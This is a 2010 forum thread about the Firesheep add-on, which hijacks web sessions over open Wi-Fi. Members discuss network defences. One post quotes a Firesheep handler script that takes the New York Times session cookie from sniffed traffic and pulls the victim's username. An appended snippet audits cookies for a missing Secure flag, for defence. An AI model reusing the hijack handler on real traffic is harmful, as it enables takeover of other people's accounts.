Author Topic: Firefox Add-On Hijacks Wireless Sessions  (Read 1215 times)

Ben

  • Administrator
  • Senior Member
  • *****
  • Posts: 46,453
  • I'm an Extremist!
Firefox Add-On Hijacks Wireless Sessions
« on: October 26, 2010, 10:38:01 AM »
I'll be interested to see industry reaction to this. Of course it's always been possible, but with the Add-On it appears any idiot with a computer can do it.

Firesheep
"I'm a foolish old man that has been drawn into a wild goose chase by a harpy in trousers and a nincompoop."

AmbulanceDriver

  • Junior Rocketeer
  • friends
  • Senior Member
  • ***
  • Posts: 5,949
Re: Firefox Add-On Hijacks Wireless Sessions
« Reply #1 on: October 26, 2010, 12:40:40 PM »
Hrm....  That's *very* interesting...
Are you a cook, or a RIFLEMAN?  Find out at Appleseed!

http://www.appleseedinfo.org

"For some many people, attempting to process a logical line of thought brings up the blue screen of death." -Blakenzy

AZRedhawk44

  • friends
  • Senior Member
  • ***
  • Posts: 13,991
Re: Firefox Add-On Hijacks Wireless Sessions
« Reply #2 on: October 26, 2010, 12:53:10 PM »
Layer 2 wireless sniffing.

This is why switches are better than hubs.  Unless a NIC is in "promiscuous" mode and on the same switch fabric (a VLAN or group of switches behind the same default gateway), you can't sniff packets when you aren't along the intended route (one of the two dozen routers between you and your destination).

When your network access is an omnidirectional radio, you can't "switch" the traffic and hide it.  By default, all NICs on a wireless system are promiscuous.

Hardwire.  And put your wireless access point on a separate subnet (or even NAT-ed, and NAT your hardwire network too).  That way, if you're at home on a perfectly good hardwired connection and someone hacks your WPA/WEP/whatever access point, they can't put their wireless NIC into promiscuous mode and sniff packets on your hardwire LAN.  They'd have to hijack your top level router/switch to sniff packets.
"But whether the Constitution really be one thing, or another, this much is certain - that it has either authorized such a government as we have had, or has been powerless to prevent it. In either case, it is unfit to exist."
--Lysander Spooner

I reject your authoritah!

Ben

Re: Firefox Add-On Hijacks Wireless Sessions
« Reply #3 on: October 26, 2010, 01:12:04 PM »
I generally don't use public Wi-Fi to begin with. I use a 3G modem and Kaspersky security suite, and even then, though I may check my Amazon account or something, I'm pretty paranoid about stuff like online banking and prefer to be behind my home firewall when accessing that. I won't use the online banking app on my phone either.

Harold Tuttle

  • Professor Chromedome
  • friend
  • Senior Member
  • ***
  • Posts: 8,069
Re: Firefox Add-On Hijacks Wireless Sessions
« Reply #4 on: October 26, 2010, 02:45:15 PM »
Firesheep can also poll the traffic on your wired network.

It is scriptable for grabbing cookies from a wide swath of the web:


// Authors:
//   Ian Gallagher <crash@neg9.org>
register({
  name: 'New York Times',
  url: 'http://www.nytimes.com/',
  domains: [ 'nytimes.com' ],
  sessionCookieNames: [ 'NYT-S', 'nyt-d' ],

  processPacket: function () {
    var nyt_d = this.firstPacket.cookies['nyt-d'];
    this.sessionId = nyt_d;
  },

  identifyUser: function() {
    var resp = this.httpGet(this.siteUrl);
    this.userName = resp.body.querySelectorAll("#memberTools a")[1].innerHTML;
  }
});
"The true mad scientist does not make public appearances! He does not wear the "Hello, my name is.." badge!
He strikes from below like a viper or on high like a penny dropped from the tallest building around!
He only has one purpose--Do bad things to good people! Mit science! What good is science if no one gets hurt?!"
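
Added example, not part of the original thread and not Firesheep's own code: the handler quoted in the last post depends on the listed session cookies travelling over plain HTTP. The sketch below reuses that handler's `domains` and `sessionCookieNames` fields to check `Set-Cookie` headers for session cookies that lack the `Secure` attribute; the header values are constructed and the function names are assumptions made for illustration.

```javascript
// Handler fields copied from the script quoted above; only the fields the
// audit needs are kept.
const handler = {
  name: 'New York Times',
  domains: ['nytimes.com'],
  sessionCookieNames: ['NYT-S', 'nyt-d'],
};

// Constructed sample response headers (not captured traffic).
const sampleSetCookie = [
  'NYT-S=abc123; Domain=.nytimes.com; Path=/',
  'nyt-d=def456; Domain=.nytimes.com; Path=/; Secure; HttpOnly',
  'prefs=compact; Path=/',
];

// Parse one Set-Cookie header value into name, value and lower-cased attributes.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  if (eq < 1) return null; // malformed: no cookie name
  const attributes = {};
  for (const a of attrs) {
    if (!a) continue;
    const i = a.indexOf('=');
    const key = (i === -1 ? a : a.slice(0, i)).toLowerCase();
    attributes[key] = i === -1 ? true : a.slice(i + 1);
  }
  return { name: pair.slice(0, eq), value: pair.slice(eq + 1), attributes };
}

// Return the session cookies that lack Secure, i.e. the ones the browser will
// also attach to plain-HTTP requests, where anyone on the segment can read them.
function exposedSessionCookies(h, setCookieHeaders) {
  const wanted = new Set(h.sessionCookieNames);
  return setCookieHeaders
    .map(parseSetCookie)
    .filter((c) => c && wanted.has(c.name) && !c.attributes.secure)
    .map((c) => c.name);
}

console.log(exposedSessionCookies(handler, sampleSetCookie)); // [ 'NYT-S' ]
```

A site that serves every page over HTTPS and marks its session cookies `Secure` returns an empty list here, and its sessions are not readable by a passive listener on the same wireless segment.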